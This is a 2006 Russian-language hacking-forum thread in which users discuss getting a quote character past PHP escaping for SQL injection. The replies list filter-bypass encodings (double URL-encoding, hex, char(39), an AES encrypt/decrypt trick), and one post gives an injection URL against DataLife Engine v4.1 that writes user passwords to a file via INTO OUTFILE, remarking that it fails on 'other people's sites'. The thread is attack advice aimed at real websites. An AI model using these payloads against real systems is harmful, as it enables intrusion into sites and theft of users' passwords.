ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу какие есть методы преобразования Sql запроса для обхода фильтрации
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

какие есть методы преобразования Sql запроса для обхода фильтрации
  #1  
Старый 12.09.2006, 14:35
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762

Репутация: -1
Question какие есть методы преобразования Sql запроса для обхода фильтрации
например простейший запрос
SELECT * FROM users where name = 'geborat'
непроходит превращается в
SELECT * FROM users where name = 'geborat\'
в hex формате ковычка проходит но такой запрос не выполняется
SELECT * FROM users where name = 'geborat char(0x27)
выполняется в таком формате
SELECT * FROM users where name = 0x6765626f726174
но первую ковычку я убрать не могу так как она добавляется
самим php скриптом кроме того символ \тоже обрабатывается
он просто удваевается запрос
SELECT * FROM users where name = '\geborat
превращается в
SELECT * FROM users where name = '\\geborat
как еще можно попробовать вставить ковычку
 
Ответить с цитированием

  #2  
Старый 12.09.2006, 20:01
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935

Репутация: 1202


Отправить сообщение для Elekt с помощью ICQ
По умолчанию
%27
%2527
0x27
char(39)
AES_DECRYPT(AES_ENCRYPT(blabla_string,0x71),0x71), где 0х71 просто ключ
 
Ответить с цитированием

  #3  
Старый 16.09.2006, 22:01
ysmat
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762

Репутация: -1
По умолчанию
в движке DataLife Engine v.4.1
мне удалось создать текстовый файл с паролями пользователей
_http://geborat.ru/index.php?subaction=userinfo&user=geborat%2527 INTO OUTFILE %2527/home/geborat.ru/www/1234.txt
правда почему то работает только на локахосте
на чужих сайтах запрос идет но файл не создается
может прав на запись нет или что то еще

к сожалению в DataLife Engine v.4.5 вобще не работает так как
закодираваную ковычку %2527 он распознает
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какие Уязвимости есть в Iconboard? Fr1k Форумы 10 25.11.2006 14:27
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Есть ли какие узвимости в Voodoo чатах Ivel Чаты 3 18.09.2005 21:54
Методы взлома! SheFF Чаты 2 15.11.2004 13:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ